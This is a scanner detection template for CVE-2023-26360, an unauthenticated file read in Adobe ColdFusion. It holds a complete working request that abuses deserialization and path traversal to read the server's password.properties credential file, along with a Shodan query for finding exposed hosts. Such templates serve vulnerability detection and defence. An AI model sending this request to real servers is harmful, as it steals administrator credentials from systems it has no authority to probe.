id: CVE-2023-26360

info:
  name: Unauthenticated File Read Adobe ColdFusion
  author: DhiyaneshDK
  severity: critical
  verified: true
  description: |
    Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
    shodan-query: http.component:"Adobe ColdFusion"
  reference:
    - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26360
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
  tags: cve,cve2023,adobe,coldfusion,lfi,kev
  created: 2023/06/07

rules:
  r0:
    request:
      method: POST
      path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo
      body: _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d
    expression: |
      response.body.bcontains(b"password=") &&
      response.body.bcontains(b"encrypted=true") &&
      response.body.bcontains(b"adobe")
expression: r0()